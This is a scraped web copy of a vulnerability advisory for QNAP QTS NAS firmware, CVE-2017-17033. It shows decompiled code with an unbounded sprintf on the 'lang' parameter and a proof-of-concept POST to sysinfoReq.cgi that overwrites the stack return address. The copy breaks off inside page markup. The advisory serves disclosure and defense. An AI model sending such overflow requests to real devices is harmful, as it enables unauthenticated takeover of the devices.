{"id":10807,"date":"2017-12-11T14:19:22","date_gmt":"2017-12-11T22:19:22","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/11\/news-4579\/"},"modified":"2017-12-11T14:19:22","modified_gmt":"2017-12-11T22:19:22","slug":"news-4579","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/12\/11\/news-4579\/","title":{"rendered":"SSD Advisory \u2013 QNAP QTS Unauthenticated Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 11 Dec 2017 10:16:42 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3565\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3565');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a memory corruption vulnerability that can lead to an unauthenticated remote code execution in QNAP QTS versions 4.3.x and 4.2.x, including the 4.3.3.0299. <\/p>\n<p>QNAP Systems, Inc. is &#8220;a Taiwanese corporation that specializes in providing networked solutions for file sharing, virtualization, storage management and surveillance applications to address corporate, SMB, SOHO and home user needs. QNAP QTS is the standard smart NAS operating  systems that empowers all file  sharing, storage, backup, virtualization and multimedia QNAP devices.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> A security researcher from, TRUEL IT ( @truel_it ), has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> QNAP was informed of the vulnerability, and responded with &#8220;We have confirmed this issue is the same as another recent report and have already assigned CVE-2017-17033 to it.<\/p>\n<p>Although this report is a duplicate, we will still mention both reporters in the security advisory which will be released shortly.<\/p>\n<p>The vulnerability will be fixed in upcoming releases of QTS 4.2.6 and 4.3.3.&#8221;<\/p>\n<p>CVE: CVE-2017-17033<\/p>\n<p><span id=\"more-3565\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> Due to lack of proper bounds checking, it is possible to overflow a stack buffer with a specially crafted HTTP request and hijack the control flow to achieve arbitrary code execution.<\/p>\n<p>authLogin.cgi is responsible to show the system  information from  the web interface, and consists in an unbounded sprintf call with user-supplied input.<\/p>\n<p>The authLogin.cgi binary, located in  the \/home\/httpd\/cgibin\/ directory of QTS file system, and is reachable by requesting the endpoint \/cgi-bin\/sysinfoReq.cgi. <\/p>\n<p>The binary is part of QTS and acts as a wrapper for several functionalities.<\/p>\n<p>The vulnerable call is located in the handle_qpkg() (0x1C680) function, which in turn is called by handle_sysInfoReq() (0x1D398) to show the current system info (modelName, firmware version, ecc).<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005.png\" data-slb-active=\"1\" data-slb-asset=\"312148789\" data-slb-internal=\"0\" data-slb-group=\"3565\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005-207x300.png\" alt=\"\" width=\"207\" height=\"300\" class=\"alignnone size-medium wp-image-3566\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005-207x300.png 207w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005.png 240w\" sizes=\"auto, (max-width: 207px) 100vw, 207px\" \/><\/a><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f0469c3a6b085748029\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8230;  if ( !strcmp(&#8220;mediaGet.cgi&#8221;, endpoint) )  {   handle_mediaGet(cgi_input);   goto LABEL_EXIT;  }  if ( !strcmp(&#8220;sysinfoReq.cgi&#8221;, endpoint) )  {   handle_sysInfoReq(cgi_input);   goto LABEL_EXIT;  }  if ( !strcmp(&#8220;authLogout.cgi&#8221;, endpoint) )  {   handle_authLogout(cgi_input);   goto LABEL_EXIT;  }  if ( !strcmp(&#8220;cgi.cgi&#8221;, endpoint) )  {   handle_cgi(cgi_input);   goto LABEL_EXIT;  }  &#8230;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0017 seconds] -->  <\/p>\n<p>By sending an HTTP request to sysinfoReq.cgi, the handle_sysInfoReq() (0x1D398) function is triggered, and based on the supplied parameters, can handle different steps of process.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f0469c3a73988543340\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> int handle_sysinforeq(int http_input)  {   &#8230;   qpkg_value = CGI_Find_Parameter(http_input, (int)&#8221;qpkg&#8221;);   if (qpkg_value &amp;&amp; *( qpkg_value + 4) )   {   handle_qpkg(http_input, 1);   goto LABEL_EXIT;   }   &#8230;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a73988543340-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a73988543340-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a73988543340-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a73988543340-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a73988543340-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a73988543340-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a73988543340-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a73988543340-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a73988543340-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a73988543340-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a73988543340-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a73988543340-1\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle_sysinforeq<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a73988543340-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a73988543340-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a73988543340-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">qpkg_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CGI_Find_Parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-s\">&#8220;qpkg&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a73988543340-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">qpkg_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;&amp;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">qpkg_value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a73988543340-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a73988543340-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle_qpkg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a73988543340-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">goto<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">LABEL_EXIT<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a73988543340-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a73988543340-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a73988543340-11\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0010 seconds] -->  <\/p>\n<p>If the qpkg HTTP parameter is supplied the handle_qpkg() (0x1C680) function is invoked.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f0469c3a76902882260\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> int handle_qpkg(int http_input, int arg2)  {   &#8230;   Get_All_QPKG_Info((int)&amp;all_qpkg_info);   &#8230;   http_param_lang_p = CGI_Find_Parameter(http_input, (int)&#8221;lang&#8221;);   if ( http_param_lang_p )   sprintf(&amp;xml_file_p, &#8220;\/home\/httpd\/RSS\/rssdoc\/qpkgcenter_%s.xml&#8221;, http_param_lang_p + 4);   &#8230;   return 0;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a76902882260-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a76902882260-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a76902882260-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a76902882260-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a76902882260-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a76902882260-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a76902882260-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a76902882260-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a76902882260-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a76902882260-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a76902882260-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a76902882260-1\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">handle_qpkg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">arg2<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a76902882260-2\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a76902882260-3\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a76902882260-4\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Get_All_QPKG_Info<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">all_qpkg_info<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a76902882260-5\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a76902882260-6\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_param_lang_p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">CGI_Find_Parameter<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">http_input<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-s\">&#8220;lang&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a76902882260-7\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_param_lang<\/span><span class=\"crayon-sy\">_<\/span>p<span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a76902882260-8\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sprintf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">xml_file_p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;\/home\/httpd\/RSS\/rssdoc\/qpkgcenter_%s.xml&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http_param_lang_p<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a76902882260-9\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a76902882260-10\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a76902882260-11\"><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0011 seconds] -->  <\/p>\n<p>The handle_qpkg() function does not validate the supplied lang HTTP parameter value from the user. <\/p>\n<p>As the codepath above shows, an unauthenticated attacker can provide an arbitrary sized value for the said parameter, which then is concatenated to an existing string on a statically sized (stack) buffer via a sprintf() function call.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> By sending the following POST request we will overflow the stack and overwrite the value of the qpkg_all_info buffer with XXXX and the handle_qpkg() return address with YYYY, thus producing the following crash:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a2f0469c3a79781672416\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/sysinfoReq.cgi HTTP\/1.1  Host: 192.168.1.131:8080  User-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko\/20100101 Firefox\/53.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  Connection: close  Upgrade-Insecure-Requests: 1  Content-Type: application\/x-www-form-urlencoded  Content-Length: 343  qpkg=pwnt&amp;lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXBBBBBBBBBBBBBBBBBB  BBBBBBBBBBBBBBBBBBBBBBYYYY<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a79781672416-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a79781672416-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a79781672416-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a79781672416-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a79781672416-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a79781672416-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a79781672416-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a79781672416-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a79781672416-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a79781672416-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a79781672416-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a79781672416-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a2f0469c3a79781672416-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a2f0469c3a79781672416-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a79781672416-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cgi<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sysinfoReq<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">cgi <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a2f0469c3a79781672416-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.131<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a2f0469c3a79781672416-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span 